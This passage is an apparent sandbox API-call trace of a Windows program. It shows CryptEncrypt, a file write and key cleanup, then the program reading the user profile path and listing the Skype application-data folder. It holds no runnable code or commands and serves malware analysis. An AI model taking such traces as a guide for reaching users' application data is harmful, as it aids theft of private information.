lpMsg=0x8cef58) returned 0 [0150.250] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.250] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0150.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa318, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0150.250] CryptEncrypt (in: hKey=0x9e20b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71ce8*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71ce8*, pdwDataLen=0x8cef60*=0x8) returned 1 [0150.250] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.250] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.250] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.250] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.250] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.250] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.250] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.250] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0150.250] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.250] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0150.250] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.250] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.250] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0150.250] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.250] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0150.250] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.251] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.251] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.251] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.251] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0150.251] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0150.251] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0150.251] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0150.251] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0150.251] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.251] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.251] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.251] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.251] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.251] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.251] WriteFile (in: hFile=0x4ec, lpBuffer=0x2a71be8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71be8*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0150.252] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.252] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.252] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0150.252] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0150.252] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0150.252] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0150.252] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0150.252] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.252] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0150.252] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.252] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0150.252] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0150.253] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0150.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa4c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0150.253] CryptDestroyKey (hKey=0x9e20b8) returned 1 [0150.253] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0150.253] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0150.253] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0150.253] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0150.253] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0150.253] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0150.253] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0150.253] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0150.253] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0150.253] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0150.253] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0150.253] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0150.253] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0150.253] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0150.253] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0150.253] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0150.253] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0150.253] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0150.253] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0150.254] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0150.254] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0150.254] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0150.254] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0150.254] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.254] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0150.254] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.254] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0150.254] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.254] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.254] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0150.254] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.254] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0150.254] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.254] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.254] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.254] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.254] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0150.254] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0150.254] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0150.254] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0150.254] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0150.254] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.254] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.255] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0150.255] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.255] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0150.255] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0150.316] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0150.316] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0150.316] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0150.316] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0150.316] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0150.317] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0150.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f71e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0150.317] CryptReleaseContext (hProv=0x9bf440, dwFlags=0x0) returned 1 [0150.317] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.317] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.317] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0150.317] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.317] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0150.317] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0150.317] FreeLibrary (hLibModule=0x76390000) returned 1 [0150.317] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.317] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.317] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.317] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.317] CloseHandle (hObject=0x4ec) returned 1 [0150.318] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.318] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.318] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0150.318] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0150.318] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Skype", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpFilePart=0x8cedf4*="Skype") returned 0x25 [0150.318] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\skype")) returned 0x10 [0150.318] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd5c77649, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e1c78 [0150.319] FindNextFileW (in: hFindFile=0x9e1c78, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd5c77649, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0150.319] FindNextFileW (in: hFindFile=0x9e1c78, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd5c77649, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="RootTools", cAlternateFileName="ROOTTO~1")) returned 1 [0150.319] FindNextFileW (in: hFindFile=0x9e1c78, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd5c77649, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="RootTools", cAlternateFileName="ROOTTO~1")) returned 0 [0150.319] FindClose (in: hFindFile=0x9e1c78 | out: hFindFile=0x9e1c78) returned 1 [0150.319] GetLastError () returned 0x12 [0150.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0150.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0150.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0150.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0150.319] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0150.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0150.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0150.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0150.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0150.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0150.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0150.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0150.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0150.320] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0150.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0150.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0150.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9328 [0150.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0150.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0150.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9058 [0150.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0150.320] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0150.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0150.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0150.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0150.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.320] HeapFree (in: hHeap=0x2af0000, 